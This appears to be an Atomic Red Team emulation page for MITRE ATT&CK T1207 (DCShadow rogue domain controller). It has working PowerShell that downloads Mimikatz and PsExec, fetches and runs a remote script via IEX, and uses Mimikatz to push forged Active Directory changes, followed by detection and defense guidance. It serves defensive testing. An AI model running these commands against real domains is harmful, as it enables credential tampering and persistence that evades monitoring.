# T1207 - Rogue Domain Controller
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.

Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)

This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)

## Atomic Tests

### Atomic Test #1 - DCShadow (Active Directory)
Use Mimikatz DCShadow method to simulate behavior of an Active Directory Domain Controller and edit protected attribute.

[DCShadow](https://www.dcshadow.com/)
[Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html)

It will set the badPwdCount attribute of the target user (user/machine account) to 9999. You can check after with:
Get-ADObject -LDAPFilter '(samaccountname=<user>)' -Properties badpwdcount | select-object -ExpandProperty badpwdcount

Need SYSTEM privileges locally (automatically obtained via PsExec, so running as admin is sufficient), and Domain Admin remotely.
The easiest is to run elevated and as a Domain Admin user.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})

##### Check Prereq Commands:
```powershell
$mimikatz_path = cmd /c echo PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1" -UseBasicParsing) 
$releases = "https://api.github.com/repos/gentilkiwi/mimikatz/releases"
$zipUrl = (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url | where-object { $_.endswith(".zip") }
$mimikatz_exe = cmd /c echo PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe
$basePath = Split-Path $mimikatz_exe | Split-Path
Invoke-FetchFromZip $zipUrl "x64/mimikatz.exe" $basePath

```
##### Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe") { exit 0} else { exit 1}

```
##### Get Prereq Commands:
```powershell
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
New-Item -ItemType Directory (Split-Path "PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe" -Force

```

In [ ]:
Invoke-AtomicTest T1207 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
# starting fake DC server, as SYSTEM (required)
$dc_output_file = "PathToAtomicsFolder\..\ExternalPayloads\art-T1207-mimikatz-DC.log"
Remove-Item $dc_output_file -ErrorAction Ignore
$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:bruce.wayne /attribute:badpwdcount /value:9999`" `"exit`""
$dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c 'PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe' /accepteula -d -s PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe $mimikatzParam"

# wait for fake DC server to be ready...
Start-Sleep -Seconds 5

# server ready, so trigger replication (push) and wait until it finished
& "PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe" "lsadump::dcshadow /push" "exit"

Write-Host "`nWaiting for fake DC server to return"
Wait-Process $dc

Write-Host "`nOutput from fake DC server:"
Get-Content $dc_output_file
Start-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it
Remove-Item $dc_output_file -ErrorAction Ignore

Write-Host "End of DCShadow"
```

In [ ]:
Invoke-AtomicTest T1207 -TestNumbers 1

#### Cleanup: 
```powershell
Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore
```

In [ ]:
Invoke-AtomicTest T1207 -TestNumbers 1 -Cleanup

## Detection
Monitor and analyze network traffic associated with data replication (such as calls to DrsAddEntry, DrsReplicaAdd, and especially GetNCChanges) between DCs as well as to/from non DC hosts. (Citation: GitHub DCSYNCMonitor) (Citation: DCShadow Blog) DC replication will naturally take place every 15 minutes but can be triggered by an adversary or by legitimate urgent changes (ex: passwords). Also consider monitoring and alerting on the replication of AD objects (Audit Detailed Directory Service Replication Events 4928 and 4929). (Citation: DCShadow Blog)

Leverage AD directory synchronization (DirSync) to monitor changes to directory state using AD replication cookies. (Citation: Microsoft DirSync) (Citation: ADDSecurity DCShadow Feb 2018)

Baseline and periodically analyze the Configuration partition of the AD schema and alert on creation of nTDSDSA objects. (Citation: DCShadow Blog)

Investigate usage of Kerberos Service Principal Names (SPNs), especially those associated with services (beginning with “GC/”) by computers not present in the DC organizational unit (OU). The SPN associated with the Directory Replication Service (DRS) Remote Protocol interface (GUID E3514235–4B06–11D1-AB04–00C04FC2DCD2) can be set without logging. (Citation: ADDSecurity DCShadow Feb 2018) A rogue DC must authenticate as a service using these two SPNs for the replication process to successfully complete.


## Shield Active Defense
### Behavioral Analytics 
 Deploy tools that detect unusual system or user behavior.
 

 Instrument a system to collect detailed information about process execution and user activity, develop a sense of normal or expected behaviors, and alert on abnormal or unexpected activity.  This can be accomplished either onboard the target system or by shipping data to a centralized analysis and alerting system.
#### Opportunity
There is an opportunity to detect the presence of an adversary by identifying and alerting on anomalous behaviors.
#### Use Case
A defender can implement behavioral analytics which would indicate activity on or against a domain controller. Activity which is out of sync with scheduled domain tasks, or results in an uptick in traffic with a particular system on the network could indicate malicious activity.
#### Procedures
Use behavioral analytics to detect Living Off The Land Binaries (LOLBins) being used to download and execute a file.
Use behavioral analytics to identify a system running development tools, but is not used by someone who does development.
Use behavioral analytics to identify abnormal system processes being used to launch a different process.
